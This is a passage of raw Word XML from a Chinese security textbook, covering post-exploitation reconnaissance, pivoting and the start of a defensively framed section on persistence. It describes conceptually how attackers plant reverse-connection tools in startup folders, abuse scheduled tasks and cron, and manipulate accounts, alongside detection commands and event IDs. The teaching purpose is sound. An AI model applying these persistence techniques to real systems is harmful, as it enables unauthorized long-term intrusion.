      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ping扫描发现同网段其他存活主机；</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查找系统上的SUID文件和可写目录。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录每个命令的输出，分析哪些信息对后续攻击有潜在价值（不需实际利用，仅信息收集阶段）。练习完成后回滚快照。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后渗透信息收集是立足点建立后的首要行动，目标是在权限范围内最大化了解内网拓扑、存活主机、用户凭据、信任关系等关键信息。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Pivoting以已控主机为网络中继，将攻击面从初始网段延伸到原本不可达的子网，其技术本质是对IP路由模型和网络代理机制的利用。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信息收集与Pivoting活动分别产生端点行为和网络流量的异常信号，蓝队可以通过端点审计、流量基线分析、登录行为关联等多种手段进行检测。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">凭据复用是横向移动的高效助推器，但也是蓝队检测的高价值信号源——异常的登录主机、时间和频率模式是检测的关键。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络分段、最小权限、LAPS和MFA是防御横向移动的核心措施。攻击者的成功依赖于信任边界的突破，防御者应通过分层管控压缩信任面。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读（白名单）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- MITRE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ATT&amp;CK框架：Discovery（发现）战术下的各项技术（T1016网络配置发现、T1046网络服务扫描、T1087账户发现等）和Lateral</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Movement（横向移动）战术下的技术（T1021远程服务、T1550使用备选认证材料等）。ATT&amp;CK为每项技术提供了检测建议和数据源。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- Bejtlich《The Practice of Network Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitoring》：第12-14章详细讨论了网络流量基线分析、异常连接检测和内网横向移动的NSM方法。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">OffSec《PEN-200》课程材料中"Active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Directory Enumeration &amp; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacks"和"Pivoting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Tunneling"章节（以课程授权版本为准，陈述级）。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">微软官方安全文档：有关LAPS部署、Credential</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Guard、网络分段最佳实践的指南，提供了具体的防御配置步骤。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="313"/>
    <w:bookmarkStart w:id="314" w:name="持久化的原理与检测防御习题小结延伸"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">18.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">持久化的原理与检测·防御·习题·小结·延伸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">【授权与隔离声明框】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所有关于持久化机制的讨论，目的仅在于帮助读者理解攻击者行为逻辑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">及蓝队检测手段，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">严禁在未经书面授权的系统上尝试实施任何攻击性操作</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文中出现的命令示例、检测思路与追踪方法，仅限读者在自建隔离实验环境</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或已获书面授权的靶机（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HackTheBox、TryHackMe、VulnHub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">镜像）中使用。实验网络必须与生产网络及公网物理或逻辑隔离。未经授权</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问他人计算机系统属于违法行为。本书不教授任何用于绕过防病毒软件、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">EDR/XDR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或日志审计系统的规避技术。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">我们首先回顾攻击链的逻辑链条：攻击者在完成初始入侵（见第17章）与提权（见第15、16章）之后，即使获得了较高权限，一旦目标系统重启、用户注销或会话超时，这个立足点就可能丢失。因此，攻击者的下一步必然是想办法在目标系统或网络中长期驻留，确保失陷后的访问通道不会因为简单的重启或凭证轮换而中断——这就是持久化（Persistence）要解决的核心问题。与此同时，内网横向移动（见18.1节）虽然扩展了控制范围，但如果缺乏持久化机制，整个攻击成果就建立在极其脆弱的临时会话之上。因此，理解持久化的原理对于蓝队来说至关重要，因为持久化行为必然会在系统中留下可检测的痕迹。本节内容严格遵循本书的攻防对称原则与伦理红线（见图18.2‑1），所有讨论均以防守检测为根本目标：我们将分析攻击者在授权测试场景中可能会尝试建立驻留的若干逻辑位置，以及这些尝试会在操作系统的哪些角落留下什么样的取证痕迹，最终导向蓝队如何系统性地检测和消除这些持久化机制。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="314"/>
    <w:bookmarkStart w:id="315" w:name="持久化的攻击动机与防御者的检测逻辑"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">18.2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">持久化的攻击动机与防御者的检测逻辑</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从防御者视角来看，持久化并非某种单一的高深漏洞，而是攻击者对操作系统正常配置机制的一种滥用。现代操作系统中存在大量让程序或脚本自动执行的合法途径，例如系统启动时运行的启动项、用户登录时加载的配置、由系统调度定期执行的任务计划，以及系统中已存在的合法账户。攻击者一旦获得足够的权限（通常需要管理员或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限，但也存在仅需普通用户权限即可实施的持久化手段），通常不需要利用新的内存破坏漏洞，而只需要向这些合法的自动启动通道中写入载荷或配置，即可实现驻留。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">因此，持久化检测的本质可以归结为一句话：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">找出那些本不该存在、却悄然加入的自动执行逻辑或特权访问路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。这意味着，蓝队必须对系统中每一个能够让代码在特定时间（系统启动、用户登录、计划任务触发等）自动执行的位置了如指掌，并建立基线，通过持续监控和比对来发现异常。这是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架中将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Persistence </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">作为独立战术（Tactic）的原因——它不仅仅是一个单一技术，而是一整套在失陷后维持立足点的行为集合。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="315"/>
    <w:bookmarkStart w:id="320" w:name="常见持久化思路及其留下的痕迹"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">18.2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">常见持久化思路及其留下的痕迹</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在授权测试环境中，测试人员可能会尝试通过以下几类典型机制建立持久化，但本书仅从防御检测视角对这些机制进行概念层面的讲解（标记为③示意），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">不提供任何可直接用于部署的武器化命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。我们的侧重点是：攻击者每尝试一种驻留路径，就会在文件系统、注册表、任务计划库或账户数据库中留下一条可追踪的记录。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="316" w:name="利用自启动目录与启动配置"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（1）利用自启动目录与启动配置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统中，存在专门的“启动”文件夹（Startup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Folder），放置在该文件夹中的程序或快捷方式会在特定用户登录时自动执行。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统中，类似的机制可能是桌面环境自动启动目录（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">~/.config/autostart/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）或传统的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rc.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等启动脚本。从攻击者视角看，将一个轻量级载荷（如反向连接工具）复制到这些目录中，就实现了一种最简单的、依赖于用户登录的持久化③。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">留下的痕迹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：此类操作会在文件系统中新增或修改可执行文件。蓝队通过文件完整性监控（File</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Integrity Monitoring, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">FIM）工具对启动目录进行审计，任何新增、修改或权限变更都应触发告警。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中，可通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PowerShell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令检查启动文件夹内容（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-CimInstance Win32_StartupCommand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，输出因系统而异②）；在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中，可通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">lsattr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等工具核查相关目录。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="316"/>
    <w:bookmarkStart w:id="317" w:name="滥用计划任务与-cron-作业"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（2）滥用计划任务与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">作业</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">计划任务（Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Task </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Scheduler）和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">cron（Linux/Unix）是攻击者在持久化中极为偏爱的机制③。攻击者可以创建一个计划任务，设定在系统启动时、特定时间或特定事件（如用户登录）发生时触发，从而执行恶意载荷。这种行为的高隐蔽性在于，计划任务的触发条件灵活且不易被普通用户察觉。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">留下的痕迹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">下的计划任务配置存储在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\System32\Tasks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目录的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件中，同时注册表中也保有相关信息。Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">作业通常分布于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/spool/cron/crontabs/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/crontab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/cron.*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目录中。蓝队应定期导出当前所有计划任务列表与已知干净的基线进行比照。任何非标准命名、指向临时目录或带有可疑命令行参数的新创建的任务都值得深入调查。ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对于计划任务技术（T1053）的检测建议包括：监控进程创建事件（Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EID 4688 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sysmon EID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1）中是否出现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">schtasks.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的异常调用，以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">守护进程在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> syslog </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中留下的日志记录。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="317"/>
    <w:bookmarkStart w:id="318" w:name="账户操纵与凭据维持"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（3）账户操纵与凭据维持</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者可能通过创建新的本地账户或域账户，或修改现有账户的属性（例如激活已禁用的来宾账户、将低权限账户加入管理员组）来实现持久的合法访问③。在某些场景中，攻击者甚至会尝试窃取或复制</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kerberos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
